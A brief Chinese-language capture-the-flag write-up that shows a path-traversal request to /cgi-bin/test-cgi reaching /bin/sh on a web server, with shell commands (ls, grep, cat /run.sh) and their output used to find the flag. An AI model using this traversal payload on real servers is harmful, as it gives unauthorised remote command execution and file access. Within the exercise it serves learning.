参考1参考2题目链接

漏洞发现

通过中间件版本

攻击命令

/cgi-bin/test-cgi/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh

echo;ls

bin
boot
dev
etc
flag_is_here
home
lib
lib64
media
mnt
opt
proc
root
run
run.sh
sbin
srv
sys
tmp
usr
var

接下来在flag_is_here中搜就行

echo;grep -r "NSS" /flag_is_here

或者

echo;cat /run.sh

回显

#! /bin/bash

echo $FLAG > /flag_is_here/2/0/7/6/flag
FLAG=no_flag
export FLAG=no_flag

httpd-foreground

待学习

CVS泄露